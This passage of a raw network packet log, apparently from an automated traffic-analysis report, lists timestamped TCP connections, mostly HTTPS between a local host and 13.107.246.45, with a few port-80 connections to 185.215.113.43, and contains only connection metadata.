                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.445319891 CET4436375613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.445328951 CET63756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.445333004 CET4436375613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.447344065 CET63759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.447355986 CET4436375913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.447407961 CET63759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.447494030 CET4436375513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.447521925 CET63759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.447530031 CET4436375913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.447695017 CET4436375513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.447756052 CET63755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.447783947 CET63755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.447793961 CET4436375513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.447807074 CET63755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.447810888 CET4436375513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.449780941 CET63760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.449793100 CET4436376013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.449856043 CET63760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.449966908 CET63760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.449978113 CET4436376013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.458244085 CET4436375313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.458297968 CET4436375313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.458427906 CET63753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.458568096 CET63753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.458578110 CET4436375313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.458590031 CET63753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.458594084 CET4436375313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.460206032 CET63761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.460225105 CET4436376113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.460289955 CET63761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.460392952 CET63761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.460405111 CET4436376113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.892782927 CET4436375713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.893171072 CET63757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.893192053 CET4436375713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.893570900 CET63757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.893575907 CET4436375713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.024663925 CET4436375713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.024776936 CET4436375713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.024831057 CET63757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.024935961 CET63757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.024949074 CET4436375713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.024960995 CET63757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.024965048 CET4436375713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.033235073 CET63762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.033272028 CET4436376213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.033337116 CET63762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.033485889 CET63762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.033502102 CET4436376213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.193758965 CET4436376013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.194114923 CET63760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.194133043 CET4436376013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.194525003 CET63760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.194529057 CET4436376013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.211463928 CET4436375813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.211752892 CET63758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.211761951 CET4436375813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.212093115 CET63758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.212099075 CET4436375813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.238538980 CET4436376113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.238873005 CET63761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.238892078 CET4436376113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.239238977 CET63761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.239243984 CET4436376113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.277153969 CET4436375913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.277523041 CET63759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.277535915 CET4436375913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.277796984 CET63759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.277801037 CET4436375913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.325984001 CET4436376013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.326123953 CET4436376013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.326195002 CET63760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.326241970 CET63760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.326261997 CET4436376013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.326275110 CET63760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.326280117 CET4436376013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.328576088 CET63763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.328605890 CET4436376313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.328685045 CET63763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.328795910 CET63763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.328804970 CET4436376313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.345191956 CET4436375813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.345382929 CET4436375813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.345442057 CET63758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.345479965 CET63758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.345489025 CET4436375813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.345498085 CET63758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.345509052 CET4436375813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.347143888 CET63764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.347158909 CET4436376413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.347230911 CET63764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.347337961 CET63764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.347342014 CET4436376413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.374362946 CET4436376113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.374516964 CET4436376113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.374612093 CET63761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.379498005 CET63761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.379513979 CET4436376113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.381900072 CET63765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.381927967 CET4436376513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.382009983 CET63765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.382144928 CET63765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.382155895 CET4436376513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.412559032 CET4436375913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.412604094 CET4436375913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.412661076 CET63759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.412782907 CET63759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.412789106 CET4436375913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.412797928 CET63759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.412801027 CET4436375913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.414617062 CET63766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.414624929 CET4436376613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.414696932 CET63766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.414808035 CET63766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.414815903 CET4436376613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.769710064 CET4436376213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.770134926 CET63762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.770159006 CET4436376213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.770577908 CET63762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.770584106 CET4436376213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.900953054 CET4436376213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.901153088 CET4436376213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.901206017 CET63762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.901230097 CET63762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.901242971 CET4436376213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.901252031 CET63762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.901256084 CET4436376213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.904757977 CET63767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.904781103 CET4436376713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.904871941 CET63767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.905066013 CET63767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:03.905076981 CET4436376713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.064773083 CET4436376313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.066492081 CET63763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.066509962 CET4436376313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.066926003 CET63763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.066930056 CET4436376313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.104202986 CET4436376413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.116266966 CET63764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.116276026 CET4436376413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.116724014 CET63764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.116728067 CET4436376413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.124536991 CET4436376513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.125022888 CET63765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.125034094 CET4436376513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.125433922 CET63765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.125439882 CET4436376513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.179308891 CET4436376613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.192564964 CET4436376313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.192747116 CET4436376313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.192832947 CET63763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.214710951 CET63766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.214718103 CET4436376613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.215321064 CET63766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.215323925 CET4436376613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.215790987 CET63763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.215809107 CET4436376313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.215817928 CET63763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.215822935 CET4436376313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.218157053 CET63768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.218240023 CET4436376813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.221410036 CET63768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.221580982 CET63768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.221611977 CET4436376813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.243731976 CET4436376413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.243866920 CET4436376413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.243928909 CET63764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.246160030 CET63764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.246166945 CET4436376413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.246202946 CET63764443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.246206999 CET4436376413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.262394905 CET4436376513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.262533903 CET4436376513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.262593031 CET63765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.264373064 CET63765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.264393091 CET4436376513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.264408112 CET63765443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.264414072 CET4436376513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.292745113 CET63769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.292829990 CET4436376913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.292936087 CET63769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.297166109 CET63770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.297246933 CET4436377013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.297287941 CET63769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.297322989 CET4436376913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.297322989 CET63770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.297413111 CET63770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.297431946 CET4436377013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.555951118 CET4436376613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.556004047 CET4436376613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.556051970 CET63766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.599375963 CET63766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.599384069 CET4436376613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.599392891 CET63766443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.599397898 CET4436376613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.602145910 CET63771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.602226019 CET4436377113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.602294922 CET63771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.603624105 CET63771443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.603658915 CET4436377113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.630903959 CET4436376713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.633928061 CET63767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.633944035 CET4436376713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.639386892 CET63767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.639394045 CET4436376713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.763780117 CET4436376713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.763839006 CET4436376713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.763887882 CET63767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.765794992 CET63767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.765815020 CET4436376713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.765825987 CET63767443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.765832901 CET4436376713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.770490885 CET63772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.770513058 CET4436377213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.770575047 CET63772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.770755053 CET63772443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.770766973 CET4436377213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.790539980 CET6377380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.795547009 CET8063773185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.795629025 CET6377380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.795835018 CET6377380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.800645113 CET8063773185.215.113.43192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.987930059 CET4436376813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.988571882 CET63768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.988609076 CET4436376813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.989406109 CET63768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:04.989423037 CET4436376813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.039906025 CET4436376913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.040421963 CET63769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.040465117 CET4436376913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.040904999 CET63769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.040935993 CET4436376913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.068563938 CET4436377013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.068906069 CET63770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.068932056 CET4436377013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.069401026 CET63770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.069411993 CET4436377013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.122932911 CET4436376813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.123123884 CET4436376813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.123202085 CET63768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.123246908 CET63768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.123281956 CET4436376813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.123306990 CET63768443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.123342037 CET4436376813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.125976086 CET63774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.126000881 CET4436377413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.126065969 CET63774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.126197100 CET63774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.126210928 CET4436377413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.172034979 CET4436376913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.172081947 CET4436376913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.172156096 CET63769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.172281981 CET63769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.172281981 CET63769443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.172310114 CET4436376913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.172333956 CET4436376913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.174180984 CET63775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.174251080 CET4436377513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.174316883 CET63775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.174420118 CET63775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.174447060 CET4436377513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.202969074 CET4436377013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.203113079 CET4436377013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.203190088 CET63770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.203233957 CET63770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.203233957 CET63770443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.203269005 CET4436377013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.203289032 CET4436377013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.204989910 CET63776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.205014944 CET4436377613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.205091953 CET63776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.205328941 CET63776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.205341101 CET4436377613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.341315031 CET4436377113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:05.341674089 CET63771443192.168.2.413.107.246.45
